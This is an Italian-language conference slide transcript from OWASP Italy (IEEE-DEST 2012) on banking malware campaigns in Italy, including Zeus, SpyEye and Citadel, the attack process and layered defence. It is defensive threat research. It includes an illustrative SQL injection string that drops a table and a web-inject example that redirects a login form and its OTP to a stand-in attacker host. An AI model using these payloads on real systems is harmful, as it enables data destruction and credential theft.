Fedon IEEE Dest 2012 - Banking Cybercrime in Italia

Transcript

Banking Cybercrime:
Attacchi e scenari di banking malware in Italia
Giorgio Fedon
Owasp Italy – Technical Director
[email protected]
IEEE-DEST
2012
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
Presentazione
Ricerca
OWASP Italy – Board Member
OWASP Antimalware project leader
Testing Guide Contributor
Scopritore di vulnerabilità 0day in
software ritenuti “prominent”
Co-founder at Minded Security
Azienda leader in attività di
Codereview, Penetration Testing,
Malware Research e Intelligence
Blog: http://blog.mindedsecurity.com
IEEE DEST, 18 Giugno 2012
2
Banking Cybercrime
Attacker Viewpoint
“Le problematiche ci sono basta cercarle”
4
Interazioni fra tipologie di attacco
Sintesi del processo di attacco:
Others
Web Attacks
Attacchi
infrastrutturali
+
Attacchi contro
gli utenti
Others
Phishing
Malware
5
Fonte: http://projects.webappsec.org/w/page/13246995/WebHacking-Incident-Database
6
1 – Web Attacks (SQL Injection)
UTENTE:
Luca D’; DROP TABLE
ACCOUNTS--
7
Web Attacks e Resource Sharing
“Il customer service
condivide risorse con il
portale di internet banking,
va incluso nell’analisi”
customerservice.bank.co
DMZ
(stesso
segmento di
rete)
Client
Reverse Proxy
Web Services
Bank.co
8
1 – Denial of Service
Thousands of Zombies
9
3 - Malware
TROJAN
HORSE
10
MITB con Manipoplazione HTML (WebInject)
Infected Laptop
https://www.bank.corp
https://www.bank.corp
<form action=“https://www.bank.corp”>
<form action=“https://attacker.co”>
POST https://www.bank.corp otp=5734
POST https://attacker.co otp=5734
11
Banking Malware 2012
Schema del Processo di Attacco Malware
Infezione e Controllo
Campagna Phishing, Exploit,
Rootkit
Furto di identità e credenziali
Keylogging, FormGrabbing,
Videograbbing
Salvataggio dati utente
Standard Dropzone, P2P Network
Fastflux
Preparazione al Cash Out
Modifica Dati dell’account,
Manipolazione UI
Cash Out
Money Transfer, Mobile Phone
Charge, Pump & Dump
Fonte: Owasp Antimalware 2012
13
Campagna di infezione Web
Naturalmente le infezioni non sono veicolate
unicamente tramite Email
Es. Italiano di Ottobre 2011:
Attacco alle piattaforme di advertising
14
2010
Zeus the MOABM
(Mother Of All Banking Malware)
2011
Spyeye + Zeus
Zeus 2.0.8.9
2012
ICE IX
Citadel
Aggiunte funzionalità di
Manipolazione della Cache
Codice
Pubblico
Zeus P2P
Basato su Zeus
Revisione generale anti-av
Citadel 1.3
Nuova
versione…
15
Citadel 1.3.3 (Spring Edition)
Fonte: http://cyb3rsleuth.blogspot.co.uk
16
Matrice delle caratteristiche
17
Meccanismo Di Autenticazione
Password
TAN (Gridcard, Scratch Card)
Transaction Authorization Numbers
OTP (Time Based, Click Based)
One Time password
CAP (Random Nonce, Challenge Response)
Card Authentication Protocol; Random Nonce is like OTP
SMS Challenges
Cellphone Caller ID
18
Cosa avviene in italia
italia?
?
Informazioni
Statistiche Malware
Campagne Spyeye verso l’Italia
Codename “Maximus”
Numero Binari: 140+
Numero Configurazioni: 30+
Server C&C Impiegati: 10
Versioni di Spyeye Utilizzate
1.3.45
1.3.48
Target Italiani: 20
Comparsa a Giugno 2011, ancora attiva
Fonte: Giuseppe Bonfa – Owasp Antimalware
20
Campagne Spyeye verso l’Italia (2)
Codename “Geed”
Numero Binari: 60+
Numero Configurazioni: 100+
Server C&C Impiegati: 40
Versioni di Spyeye Utilizzate
1.3.45
1.3.48
Target Italiani: 9
Comparsa a Giugno 2011, ancora attiva
21
Campagna più longeva: Profi.bin
Comparsa il 01-01-2010
Versione di Zeus 2.0.8.9 Modificata
Dropzone caratteristica: “/ext/red.php”
Target Italiani: Aumento del 300% nel 2012
60
50
40
30
20
10
0
Settembre
Dicembre
Gennaio
22
Tratti distintivi: Profi.bin
Numero di configurazioni superiori alle 100
unità
Prevalenza Domini Utilizzati:
*.co.cc
*.cz.cc
*.hotmail.ru (dal 27-11-2011)
Numero di target Italiani quasi invariato fino a
Dicembre 2011. Nuovi target con aumento
massiccio da Dicembre 2011 a Gennaio 2012
23
Campagna più attiva: Zeus P2P
Data Comparsa: 08-02-2012
Configurazioni:142 updates
(nome random - inizio data: 13-02-2012) 105
updates
Tipologia Servers: Tutti i domini utilizzati per
ospitare la variante P2P appartengono a server
compromessi (NO BULLET PROOF).
La campagna riguarda esclusivamente target
italiani
24
Campagna più attiva: Zeus P2P
Targets
Banche
Servizi di Telefonia Mobile
Sito di Ordine Governativo (pubblica amministrazione)
L'aggiornamento della configurazione avviene
come update dell'eseguibile stesso.
La dropzone solitamente non si trova nello
stesso server di C&C.
A Marzo 2012 aumento del 40% dei target
Italiani supportati
25
Approccio alla Difesa
Layered Defense Process
27
Owasp Antimalware
Unhide
Infection
Counter
Attack
Cashing
Out
Reveal
Malicious
Operations
Counter
attack
Identity
Theft
Dropzone
Response
28
Domande
IEEE-DEST
2012
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org

Fedon IEEE Dest 2012 - Banking Cybercrime in Italia

Transcript

Documenti analoghi

IEEE Xplore Training e Aggiornamento

OWASP e Case

http://techdata.it/apps/datasheets/default.asp?sku=HP DG285T

Introduzione all`OWASP

Buzzwords Security

Allegato 2

Specifiche estese

Secure Code Review: dalla teoria alla pratica

OWASP Plan - Strawman

Curriculum Vitae - Actrix Networks

Programmazione degli Shaders in DirectX 9.0 (parte prima

fruizione evoluta via web di contenuti musicali e multimediali

OWASP Top 10 – 2010 (Precedente) OWASP Top 10 – 2013

IP forwarding - DEISNet Reti di Telecomunicazione

Switch ProCurve serie 2300

GUIDA OWASP REVISIONE DEL CODICE

curriculum vitae - Università degli Studi di Modena e Reggio Emilia

estrarre audio da video

malware

Vertical Handover